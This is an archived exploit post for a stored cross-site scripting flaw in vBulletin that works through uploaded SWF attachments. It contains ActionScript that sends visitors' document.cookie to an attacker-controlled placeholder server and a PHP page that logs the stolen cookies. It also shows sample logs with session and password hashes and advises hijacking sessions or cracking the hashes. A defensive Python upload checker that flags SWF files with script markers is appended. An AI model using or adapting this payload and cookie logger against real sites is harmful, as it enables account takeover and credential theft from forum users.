XSS with vBulletin (new idea!)

2006.12.29
Credit: Ashraf Morad
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Author : Ashraf Morad
Contact : ashraf1984 (at) hotmail (dot) com

XSS with vBulletin (Attachments supported, SWF is a valid extension)!

Materials:

- Any SWF file with an ActionScript frame.

  ActionScript code:

      getURL("javascript:function blab(){}var scriptNode = document.createElement('script');document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src='http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie;blab();");

- A hosted PHP page, UrPHPpage.php.

  Code:

      <?
      $fp = fopen("Mylog.txt","a");
      if($_GET['Cookie'])
      {
          $str=" ".date("Y-m-d h:i:s")."^".$_GET['Cookie'];
          fwrite($fp,$str);
      }
      fclose($fp);
      ?>

  Or you can send the cookie to your email ...

Then the log file will be like this:

    2006-12-22 10:00:57^bbsessionhash=5d5bbd44581e8670511dea2336bf6b7c; bblastvisit=1166967717; bblastactivity=0; bbforum_view=7dc07389c9e27c2ff67b4da319df9596a-1-{i-3_i-1166967717_}; bbuserid=913; bbpassword=ae0f78853127d9847dce0bfe6427bc2d
    2006-12-22 10:25:39^bblastvisit=1166967717; bblastactivity=0; bbuserid=9913; bbpassword=ae0f78853127d9847dce0bfe6427bc2d; bbsessionhash=3d085f4ee5d4e4ac7af73e18d8fb6539; bbforum_view=6f750f5b123c84f0be72a9844b9cebaba-1-{i-3_i-1166973674_}

Then you can use any cookie editor or you can crack the MD5 password hash ... enjoy ;)
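A defensive upload check for the attachment vector described above, as an added example that is not part of the original advisory or of vBulletin's code: it identifies Flash files by magic bytes rather than by extension, unpacks zlib-compressed (CWS) movies, and flags literal javascript: or document.cookie strings. The function names, the marker list and the sample bytes are assumptions constructed for illustration.

```python
import struct
import zlib

MARKERS = (b"javascript:", b"document.cookie")  # assumed marker list
MAX_BODY = 8 * 1024 * 1024  # cap on inspected bytes (decompression-bomb guard)


def swf_body(data):
    """Return (is_swf, body); body is None when the movie cannot be inspected."""
    sig = data[:3]
    if len(data) < 8 or sig not in (b"FWS", b"CWS", b"ZWS"):
        return False, None
    if sig == b"FWS":  # uncompressed movie
        return True, data[8:8 + MAX_BODY]
    if sig == b"CWS":  # zlib stream follows the 8-byte header
        try:
            return True, zlib.decompressobj().decompress(data[8:], MAX_BODY)
        except zlib.error:
            return True, None
    return True, None  # ZWS (LZMA) is not unpacked in this example


def inspect_attachment(filename, data):
    """Classify an upload by content; block SWFs that carry script markers."""
    is_swf, body = swf_body(data)
    result = {"is_swf": is_swf, "markers": [], "block": False,
              "renamed": is_swf and not filename.lower().endswith(".swf")}
    if not is_swf:
        return result
    if body is None:  # corrupt or uninspectable Flash file: fail closed
        result["block"] = True
        return result
    low = body.lower()
    result["markers"] = [m.decode() for m in MARKERS if m in low]
    result["block"] = bool(result["markers"])
    return result


def make_sample(sig, payload):
    """Constructed input: SWF-style header plus raw body, not a playable movie."""
    body = zlib.compress(payload) if sig == b"CWS" else payload
    return sig + bytes([8]) + struct.pack("<I", 8 + len(payload)) + body


if __name__ == "__main__":
    flagged = make_sample(b"CWS", b"\x00getURL\x00JavaScript:alert(document.cookie)\x00")
    print(inspect_attachment("avatar.swf", flagged))
```

Literal string matching misses markers that are assembled at run time, so a check like this belongs alongside serving attachments with `Content-Disposition: attachment` from a separate origin and marking session cookies HttpOnly.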



Copyright 2022, cxsecurity.com

 
